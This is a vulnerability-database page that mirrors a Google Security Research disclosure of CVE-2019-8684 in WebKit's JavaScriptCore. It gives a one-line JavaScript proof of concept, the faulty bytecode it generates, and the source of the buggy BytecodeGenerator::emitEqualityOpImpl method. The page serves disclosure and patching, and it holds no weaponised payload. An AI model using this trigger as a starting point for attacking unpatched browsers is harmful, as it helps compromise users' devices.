Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

JSC BytecodeGenerator::emitEqualityOpImpl Data Mishandling

🗓️ 30 Jul 2019 00:00:00Reported by Google Security ResearchType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 178 Views

A bug in BytecodeGenerator::emitEqualityOpImpl misinterprets typeof instructio

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus		Amazon Linux 2 : webkitgtk4 (ALAS-2020-1563)
11 Nov 202000:00
nessus
Tenable Nessus		Apple TV < 12.4 Multiple Vulnerabilities
26 Jul 201900:00
nessus
Tenable Nessus		Apple iOS < 12.4 Multiple Vulnerabilities
23 Jul 201900:00
nessus
Tenable Nessus		CentOS 7 : webkitgtk4 (RHSA-2020:4035)
30 Nov 202000:00
nessus
Tenable Nessus		Debian DSA-4515-1 : webkit2gtk - security update
5 Sep 201900:00
nessus
Tenable Nessus		FreeBSD : webkit2-gtk3 -- Multiple vulnerabilities (e45c3669-caf2-11e9-851a-dcf3aaa3f3ff)
3 Sep 201900:00
nessus
Tenable Nessus		GLSA-201909-05 : WebkitGTK+: Multiple vulnerabilities
9 Sep 201900:00
nessus
Tenable Nessus		Apple iCloud 7.x < 7.13 / 10.x < 10.6 Multiple Vulnerabilities
20 Aug 201900:00
nessus
Tenable Nessus		Apple iTunes < 12.9.6 Multiple Vulnerabilities (credentialed check)
26 Jul 201900:00
nessus
Tenable Nessus		Apple iTunes < 12.9.6 Multiple Vulnerabilities (uncredentialed check)
26 Jul 201900:00
nessus
Rows per page
`JSC: A bug in BytecodeGenerator::emitEqualityOpImpl   
  
Related CVE Numbers: CVE-2019-8684.  
  
  
PoC:  
let a = (1 || typeof 1) === 'string';  
  
Generated bytecode:  
<global>#BPmgTo:[0x7ff1965a0000->0x7ff1965a8000, NoneGlobal, 37]: 11 instructions (0 wide instructions, 2 instructions with metadata); 225 bytes (188 metadata bytes); 1 parameter(s); 10 callee register(s); 6 variable(s); scope at loc4  
[ 0] enter   
[ 1] get_scope loc4  
[ 3] mov loc5, loc4  
[ 6] check_traps   
[ 7] mov loc6, Undefined(const0)  
[ 10] resolve_scope loc7, loc4, 0, GlobalProperty, 0  
[ 17] mov loc8, Int32: 1(const1)  
[ 20] jtrue loc8, 6(->26)  
[ 23] is_cell_with_type loc8, Int32: 1(const1), StringType  
[ 27] put_to_scope loc7, 0, loc8, 1048576<DoNotThrowIfNotFound|GlobalProperty|Initialization>, 0, 0  
[ 35] end loc6  
  
Identifiers:  
id0 = a  
  
Constants:  
k0 = Undefined  
k1 = Int32: 1: in source as integer  
k2 = String (atomic) (identifier): string, StructureID: 9553  
  
Here the jtrue instruction is pointing somewhere in the middle of the is_cell_with_type instruction. This is due to the bug in BytecodeGenerator::emitEqualityOpImpl which doesn't consider the case where m_lastOpcodeID is op_end which can indicate that the current position is a jump target. As a result, the method replaced wrongly the typeof instruction with the is_cell_with_type instruction.  
  
Vulnerable method:  
bool BytecodeGenerator::emitEqualityOpImpl(RegisterID* dst, RegisterID* src1, RegisterID* src2)  
{  
if (m_lastInstruction->is<OpTypeof>()) {  
auto op = m_lastInstruction->as<OpTypeof>();  
if (src1->index() == op.m_dst.offset()  
&& src1->isTemporary()  
&& m_codeBlock->isConstantRegisterIndex(src2->index())  
&& m_codeBlock->constantRegister(src2->index()).get().isString()) {  
const String& value = asString(m_codeBlock->constantRegister(src2->index()).get())->tryGetValue();  
if (value == \"undefined\") {  
rewind();  
OpIsUndefined::emit(this, dst, op.m_value);  
return true;  
}  
if (value == \"boolean\") {  
rewind();  
OpIsBoolean::emit(this, dst, op.m_value);  
return true;  
}  
if (value == \"number\") {  
rewind();  
OpIsNumber::emit(this, dst, op.m_value);  
return true;  
}  
if (value == \"string\") {  
rewind();  
OpIsCellWithType::emit(this, dst, op.m_value, StringType);  
return true;  
}  
if (value == \"symbol\") {  
rewind();  
OpIsCellWithType::emit(this, dst, op.m_value, SymbolType);  
return true;  
}  
if (Options::useBigInt() && value == \"bigint\") {  
rewind();  
OpIsCellWithType::emit(this, dst, op.m_value, BigIntType);  
return true;  
}  
if (value == \"object\") {  
rewind();  
OpIsObjectOrNull::emit(this, dst, op.m_value);  
return true;  
}  
if (value == \"function\") {  
rewind();  
OpIsFunction::emit(this, dst, op.m_value);  
return true;  
}  
}  
}  
  
return false;  
}  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available (whichever is earlier), the bug  
report will become visible to the public.  
  
  
  
Found by: [email protected]  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
30 Jul 2019 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.03272
jscbytecodegeneratoremitequalityopimpldata mishandlingcve-2019-8684bugmisinterpretationdisclosure deadlinelokihardt
178